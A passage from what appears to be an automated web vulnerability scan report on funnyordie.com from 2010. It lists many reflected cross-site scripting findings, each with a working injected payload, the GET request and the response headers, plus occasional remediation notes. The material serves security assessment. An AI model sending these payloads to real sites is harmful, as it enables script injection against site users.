GET /signup?d885a"-alert(1)-"99624835e69=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "e7da38757123bd7012cd9fb2883f5651"
X-Runtime: 103
X-Varnish: 1401114158
X-Varnish: 573890366
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 04:59:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:59:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57015
1.79. http://www.funnyordie.com/signup [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /signup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 183f4"><script>alert(1)</script>e305ed6d005 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /signup?183f4"><script>alert(1)</script>e305ed6d005=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "13b48654181646a347934b2b3ab2d8ec"
X-Runtime: 106
X-Varnish: 1401113776
X-Varnish: 573889820
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 04:59:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:59:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57289
1.80. http://www.funnyordie.com/stories/2513d56ca5/nfl-week-8-recap-we-all-want-to-be-randy-moss [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf610"><script>alert(1)</script>72f78a115ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/2513d56ca5/nfl-week-8-recap-we-all-want-to-be-randy-moss?bf610"><script>alert(1)</script>72f78a115ad=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "49f6a38b6264bf5d990f04ca3b4f7b87"
X-Runtime: 161
X-Varnish: 1401143193
X-Varnish: 573926321
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:29:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:29:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 275292
1.81. http://www.funnyordie.com/stories/2513d56ca5/nfl-week-8-recap-we-all-want-to-be-randy-moss [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d31a"-alert(1)-"d086f01b0cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/2513d56ca5/nfl-week-8-recap-we-all-want-to-be-randy-moss?1d31a"-alert(1)-"d086f01b0cf=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "3a5ca89b62ab63dda0acc1a5770b40f2"
X-Runtime: 203
X-Varnish: 1401143986
X-Varnish: 573927253
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:30:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 275208
1.82. http://www.funnyordie.com/stories/37e04d17ad/louis-c-k-addresses-the-infamous-middle-finger-in-louie-s-opening-credits [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4799"><script>alert(1)</script>742941b328b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/37e04d17ad/louis-c-k-addresses-the-infamous-middle-finger-in-louie-s-opening-credits?e4799"><script>alert(1)</script>742941b328b=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "9d5909b830811c7d31272abd6b53ba67"
X-Runtime: 198
X-Varnish: 1401129951
X-Varnish: 573909644
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:15:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:15:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 274080
1.83. http://www.funnyordie.com/stories/37e04d17ad/louis-c-k-addresses-the-infamous-middle-finger-in-louie-s-opening-credits [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1cd8"-alert(1)-"edd42e7282b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/37e04d17ad/louis-c-k-addresses-the-infamous-middle-finger-in-louie-s-opening-credits?c1cd8"-alert(1)-"edd42e7282b=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "2b68902c024267799e04c8794a3636ab"
X-Runtime: 154
X-Varnish: 1401130195
X-Varnish: 573909986
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:15:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:15:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 274078
1.84. http://www.funnyordie.com/stories/4e561641f4/the-funniest-signs-from-the-rally-to-restore-sanity-and-or-fear [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c73"-alert(1)-"d90cbceef26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/4e561641f4/the-funniest-signs-from-the-rally-to-restore-sanity-and-or-fear?76c73"-alert(1)-"d90cbceef26=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "f2561b82010cec183029e756a9f8b798"
X-Runtime: 240
X-Varnish: 1401143174
X-Varnish: 573926296
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:29:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:29:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 313661
1.85. http://www.funnyordie.com/stories/4e561641f4/the-funniest-signs-from-the-rally-to-restore-sanity-and-or-fear [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ddb"><script>alert(1)</script>6e870b6d70c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/4e561641f4/the-funniest-signs-from-the-rally-to-restore-sanity-and-or-fear?36ddb"><script>alert(1)</script>6e870b6d70c=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "ce7ad0426103f33518f1e64cb0480b54"
X-Runtime: 552
X-Varnish: 1401142331
X-Varnish: 1264379085
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:28:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:28:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 313739
1.86. http://www.funnyordie.com/stories/8d571e73b1/snoop-dogg-vs-robocop-kid-the-two-best-halloween-costumes [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7bbc"-alert(1)-"4f7352de02f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/8d571e73b1/snoop-dogg-vs-robocop-kid-the-two-best-halloween-costumes?b7bbc"-alert(1)-"4f7352de02f=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "12871a457d76d66d6b73525b4ff58e78"
X-Runtime: 497
X-Varnish: 1401140363
X-Varnish: 573922795
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:26:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:26:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 266244
1.87. http://www.funnyordie.com/stories/8d571e73b1/snoop-dogg-vs-robocop-kid-the-two-best-halloween-costumes [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10957"><script>alert(1)</script>0316b6a6bef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/8d571e73b1/snoop-dogg-vs-robocop-kid-the-two-best-halloween-costumes?10957"><script>alert(1)</script>0316b6a6bef=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "afe07e1f8201d9b575736c372ab931fa"
X-Runtime: 202
X-Varnish: 1401138955
X-Varnish: 1264375251
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:25:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:25:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 266297
1.88. http://www.funnyordie.com/stories/bda084f6e5/zach-galifianakis-smokes-joint-on-bill-maher [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1bc8"-alert(1)-"7edd7e68d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/bda084f6e5/zach-galifianakis-smokes-joint-on-bill-maher?a1bc8"-alert(1)-"7edd7e68d45=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "18c5b12c257da2b7e576b2f69ce86b90"
X-Runtime: 499
X-Varnish: 1401142378
X-Varnish: 1264379140
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:28:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:28:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 272978
1.89. http://www.funnyordie.com/stories/bda084f6e5/zach-galifianakis-smokes-joint-on-bill-maher [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68ccd"><script>alert(1)</script>2a47d3f9b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/bda084f6e5/zach-galifianakis-smokes-joint-on-bill-maher?68ccd"><script>alert(1)</script>2a47d3f9b7=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "a76a04f67e4c6f3652c208bd7ea03b6e"
X-Runtime: 188
X-Varnish: 1401140745
X-Varnish: 573923277
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:27:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:27:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 273040
1.90. http://www.funnyordie.com/stories/c775a8268a/if-the-internet-decided-the-elections [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c6d6"-alert(1)-"ff36c4490f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/c775a8268a/if-the-internet-decided-the-elections?4c6d6"-alert(1)-"ff36c4490f8=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "488bb9c33d05b11f336010b50d70d03a"
X-Runtime: 433
X-Varnish: 1401136791
X-Varnish: 573918196
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:22:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:22:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 273696
1.91. http://www.funnyordie.com/stories/c775a8268a/if-the-internet-decided-the-elections [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d90"><script>alert(1)</script>481519aab98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/c775a8268a/if-the-internet-decided-the-elections?a9d90"><script>alert(1)</script>481519aab98=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "2fcdaf9ddeb7ce1b59c412c86a67f9b5"
X-Runtime: 151
X-Varnish: 1401135236
X-Varnish: 573916423
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:21:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:21:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 273795
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57334"-alert(1)-"c804af3d5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos/0d646e2edb/lindsay-lohan-s-eharmony-profile?57334"-alert(1)-"c804af3d5a=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "81ed16081ecee3e714d9859939a9b9f7"
X-Runtime: 257
X-Varnish: 1401112354
X-Varnish: 573887724
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 04:57:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:57:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 289753
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3244"><script>alert(1)</script>c7149784f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/0d646e2edb/lindsay-lohan-s-eharmony-profile?c3244"><script>alert(1)</script>c7149784f3=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "5641e4b547e807384bf3525213b1b731"
X-Runtime: 239
X-Varnish: 1401111645
X-Varnish: 573886700
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 04:56:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:56:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 289845
1.94. http://www.funnyordie.com/videos/2641/sarah-silverman-teaching-girls-comedy-from-mysteryuploader-and-sarah-silverman [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a5d"><script>alert(1)</script>4cff7c8ab88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/2641/sarah-silverman-teaching-girls-comedy-from-mysteryuploader-and-sarah-silverman?24a5d"><script>alert(1)</script>4cff7c8ab88=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "04ff36e40176e0aa4f532953fffa7d59"
X-Runtime: 490
X-Varnish: 1401112117
X-Varnish: 573887342
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 04:57:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:57:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 277661
1.95. http://www.funnyordie.com/videos/2641/sarah-silverman-teaching-girls-comedy-from-mysteryuploader-and-sarah-silverman [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e625"-alert(1)-"8d1536164c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos/2641/sarah-silverman-teaching-girls-comedy-from-mysteryuploader-and-sarah-silverman?3e625"-alert(1)-"8d1536164c7=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "d6ca770898abf2eb0ce4a8ed16f8f815"
X-Runtime: 223
X-Varnish: 1401112663
X-Varnish: 573888230
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 04:57:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:57:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 277567
1.96. http://www.funnyordie.com/videos/60072add5a/between-two-ferns-with-zach-galifianakis-ben-stiller [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cb16"-alert(1)-"42d190ba6dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos/60072add5a/between-two-ferns-with-zach-galifianakis-ben-stiller?1cb16"-alert(1)-"42d190ba6dc=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "5479fcfafbbeb47603c53425573ac5b3"
X-Runtime: 589
X-Varnish: 1401112441
X-Varnish: 573887868
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 04:57:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:57:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 298068
1.97. http://www.funnyordie.com/videos/60072add5a/between-two-ferns-with-zach-galifianakis-ben-stiller [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d949a"><script>alert(1)</script>42731c43eff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/60072add5a/between-two-ferns-with-zach-galifianakis-ben-stiller?d949a"><script>alert(1)</script>42731c43eff=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "823765fad74159e9acddad15854484bb"
X-Runtime: 601
X-Varnish: 1401111853
X-Varnish: 1264342482
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 04:57:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:57:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 298112
1.98. http://www.funnyordie.com/videos/b88bd1c48f/the-tutors-of-826-la-from-judd-apatow-michael-cera-bill-hader-will-forte-and-craig-robinson [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 131aa"-alert(1)-"033190fb8d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos/b88bd1c48f/the-tutors-of-826-la-from-judd-apatow-michael-cera-bill-hader-will-forte-and-craig-robinson?131aa"-alert(1)-"033190fb8d0=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "558db5a60ca4343640fabad9e49aa8e7"
X-Runtime: 239
X-Varnish: 1401111264
X-Varnish: 1264341790
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 04:56:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:56:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282518
1.99. http://www.funnyordie.com/videos/b88bd1c48f/the-tutors-of-826-la-from-judd-apatow-michael-cera-bill-hader-will-forte-and-craig-robinson [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cbbb"><script>alert(1)</script>057282d756c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/b88bd1c48f/the-tutors-of-826-la-from-judd-apatow-michael-cera-bill-hader-will-forte-and-craig-robinson?4cbbb"><script>alert(1)</script>057282d756c=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "20cecd4bafeb9c60c4ff711ae5e6026b"
X-Runtime: 220
X-Varnish: 1401110986
X-Varnish: 1264341383
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 04:56:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:56:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282614
1.100. http://www.funnyordie.com/videos/c8863726da/judd-apatow-psa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /videos/c8863726da/judd-apatow-psa
Issue detail
